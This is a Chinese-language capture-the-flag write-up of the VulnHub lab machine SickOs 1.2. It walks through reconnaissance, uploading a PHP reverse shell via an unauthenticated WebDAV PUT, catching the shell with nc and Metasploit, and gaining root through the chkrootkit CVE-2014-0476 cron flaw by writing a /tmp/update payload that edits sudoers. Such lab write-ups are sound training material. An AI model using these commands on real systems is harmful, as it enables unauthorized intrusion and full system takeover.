vulnhub靶机渗透[SickOs-1-2]

Posted on Edited on In Views: Word count in article: 2.3k Reading time ≈ 8 mins.

名称

名称:SickOs: 1.2
发布日期:2016年4月27日

下载

  • Download (Mirror): https://download.vulnhub.com/sickos/sick0s1.2.zip
  • Download (Torrent): https://download.vulnhub.com/sickos/sick0s1.2.zip.torrent

描述

1
2
3
4
5
6
7
Name........: SickOs1.2
Date Release: 26 Apr 2016
Author......: D4rk
Series......: SickOs
Objective...: Get /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
Tester(s)...: h1tch1, Eagle11
Twitter.....: https://twitter.com/D4rk36
1
这是SickOs后续系列中的第二篇文章,与先前的发行版无关,挑战范围是在系统上获得最高特权。
1
2
3
4
Filename: Sick0s1.2.zip
File size: 696.2 MB
MD5: b013ba76f50c15890554632a40b697bd
SHA1: 9f45f7c060e15dc6bb93c1cf39efdd75125e30a0
1
2
3
Format: OVF
Operating System: Ubuntu
Tested on: VMWare workstation Pro 12.1.0 build-3272444
1
2
DHCP service: Enabled
IP address: Automatically assign

需要使用VMware。可能对VirtualBox有问题。如果要使用virtualbox打开的话,解决方案:打开.ovf文件,将“ElementName”的所有实例替换为“Caption”,并将“vmware.sata.ahci”替换为“AHCI”。还要删除.mf文件,然后按常规导入。

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.14
Host is up (0.00033s latency).
MAC Address: 00:0C:29:1B:36:86 (VMware)
1
2
3
4
root@kali:~# nmap -sV -v -p- 192.168.66.14
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@kali:~# nmap -A -v -p 22,80 192.168.66.14 -T4 --script=vuln
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    lighttpd 1.4.28
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560

目录爆破一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# dirb http://192.168.66.14/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 30 01:39:50 2020
URL_BASE: http://192.168.66.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.66.14/ ----
+ http://192.168.66.14/index.php (CODE:200|SIZE:163)                                                                      
==> DIRECTORY: http://192.168.66.14/test/                                                                                 
                                                                                                                          
---- Entering directory: http://192.168.66.14/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Mar 30 01:40:02 2020
DOWNLOADED: 4612 - FOUND: 1

在/test上找到目录列表,但是没有什么有趣的。我在/和/test上检查HTTP方法OPTIONS,发现/test上允许许多HTTP方法

request

1
2
3
4
5
6
7
8
OPTIONS /test/ HTTP/1.1
Host: 192.168.66.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

response

1
2
3
4
5
6
7
8
9
HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Connection: close
Date: Mon, 30 Mar 2020 05:42:43 GMT
Server: lighttpd/1.4.28

利用

允许HTTP方法PUT,而无需身份验证。攻击者可以使用HTTP方法PUT将Web Shell上传到/test。所以使用以下的curl方法上传php-reverse-shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~/vulnhub/sickos# curl --upload-file php-reverse-shell.php -v --url http://192.168.233.129/test/shell.php -0 --http1.0
*   Trying 192.168.233.129:80...
* TCP_NODELAY set
* Connected to 192.168.233.129 (192.168.233.129) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.233.129
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Length: 5494
> 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Mon, 30 Mar 2020 05:50:14 GMT
< Server: lighttpd/1.4.28
< 
* Closing connection 0

可以看到成功的上传了phpreverseshell

kali端使用nc监听端口,并用浏览器访问shell地址,成功反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.233.128] from (UNKNOWN) [192.168.233.129] 48337
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 23:07:02 up 8 min,  0 users,  load average: 0.03, 0.03, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd
/

尝试在TCP端口8890上进行侦听,发现没有连接到达我的侦听器,然后将侦听端口更改为443,并修改了php reverse shell,然后再次上传,才成功收到shell

1
2
3
4
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

列举操作系统版本。

1
2
3
4
5
6
7
8
9
10
www-data@ubuntu:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.4 LTS
Release:        12.04
Codename:       precise
www-data@ubuntu:/$ dpkg -l | grep chkrootkit
dpkg -l | grep chkrootkit
rc  chkrootkit                      0.49-4ubuntu1.1                   rootkit detector

检查cron任务,发现cron.daily有chkrootkit。知道chkrootkit—CVE-2014-0476的漏洞可能会有提升到root用户的机会。

脆弱的chkrootkit将执行/tmp/update,可以在/tmp contains shell命令中创建名为update的文件,该命令将sudo su添加到用户www-data

1
2
3
www-data@ubuntu:/$ echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
< ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update              
www-data@ubuntu:/$

然后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@ubuntu:/tmp$ chmod 777 *
chmod 777 *
chmod: changing permissions of `VMwareDnD': Operation not permitted
chmod: changing permissions of `vgauthsvclog.txt.0': Operation not permitted
chmod: changing permissions of `vmware-root': Operation not permitted
www-data@ubuntu:/tmp$ ls -la
ls -la
total 24
drwxrwxrwt  4 root     root     4096 Mar 29 23:24 .
drwxr-xr-x 22 root     root     4096 Mar 30  2016 ..
drwxrwxrwt  2 root     root     4096 Mar 29 22:58 VMwareDnD
srwxrwxrwx  1 www-data www-data    0 Mar 29 22:58 php.socket-0
-rwxrwxrwx  1 www-data www-data   76 Mar 29 23:18 update
-rw-r--r--  1 root     root     1600 Mar 29 22:58 vgauthsvclog.txt.0
drwx------  2 root     root     4096 Mar 29 22:58 vmware-root

然后等待几分钟

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:~# ls
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  chkrootkit-0.49
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt                     newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

成功的获取到了root权限,并找到了flag

提权2(使用msf提权)

设置msf,然后使用之前的php-reverse-shell反弹shell到nsf,然后将session会话置于后台

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:~# msfdb run
[i] Database already started
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                                    
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                  
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                 
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo                                                                                
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx                                                                                
  lOOOOOOOO.         ;d;         ,OOOOOOOOl                                                                                
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.                                                                                
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc                                                                                 
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo                                                                                  
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl                                                                                   
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;                                                                                    
       .dOOo   .OOOOocccxOOOO.   xOOd.                                                                                     
         ,kOl  .OOOOOOOOOOOOO. .dOk,                                                                                       
           :kk;.OOOOOOOOOOOOO.cOk:                                                                                         
             ;kOOOOOOOOOOOOOOOk:                                                                                           
               ,xOOOOOOOOOOOx,                                                                                             
                 .lOOOOOOOl.                                                                                               
                    ,dOd,                                                                                                  
                      .                                                                                                    

       =[ metasploit v5.0.80-dev                          ]
+ -- --=[ 1983 exploits - 1088 auxiliary - 339 post       ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can use help to view all available commands

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set lhost 192.168.233.128
lhost => 192.168.233.128
msf5 exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.233.128:443 
[*] Command shell session 1 opened (192.168.233.128:443 -> 192.168.233.129:48340) at 2020-03-30 02:40:05 -0400

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/
$ whoami
www-data
$ backgroud
/bin/sh: 5: backgroud: not found
$ background

Background session 1? [y/N]  y
msf5 exploit(multi/handler) >

然后,开始寻找chkroot漏洞利用程序并正确用msf配置它:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf exploit(handler) > search chkroot

Matching Modules
================

   Name                           Disclosure Date  Rank    Description
   ----                           ---------------  ----    -----------
   exploit/unix/local/chkrootkit  2014-06-04       manual  Chkrootkit Local Privilege Escalation


msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > show options 

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION                           yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(chkrootkit) > set session 1
session => 1
msf exploit(chkrootkit) > set lport 8080
lport => 8080

此外还要设置lhost为192.168.233.128
等待返回shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
msf5 exploit(unix/local/chkrootkit) > set LHOST 192.168.233.128
LHOST => 192.168.233.128
msf5 exploit(unix/local/chkrootkit) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP double handler on 192.168.233.128:8080 
msf5 exploit(unix/local/chkrootkit) > [!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo m6QrrJnhcNykbebU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "m6QrrJnhcNykbebU\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.233.128:8080 -> 192.168.233.129:37735) at 2020-03-30 03:15:49 -0400
[+] Deleted /tmp/update
id
[*] exec: id

uid=0(root) gid=0(root) 组=0(root)
msf5 exploit(unix/local/chkrootkit) > sessions -l

Active sessions
===============

  Id  Name  Type             Information                                                                       Connection
  --  ----  ----             -----------                                                                       ----------
  1         shell x86/linux  Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UT...  192.168.233.128:443 -> 192.168.233.129:48369 (192.168.233.129)
  2         shell cmd/unix                                                                                     192.168.233.128:8080 -> 192.168.233.129:37735 (192.168.233.129)

msf5 exploit(unix/local/chkrootkit) > sessions 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

成功的获取了root权限,现在来寻找flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 exploit(unix/local/chkrootkit) > sessions 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:~# ls
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  chkrootkit-0.49
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt                     newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

成功的获取到了flag

知识点总结

  • HTTP put方法写入shell
  • cron定时任务+chkrootkit漏洞CVE-2014-0476—提权
  • msf的exploit/unix/local/chkrootkit模块—提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…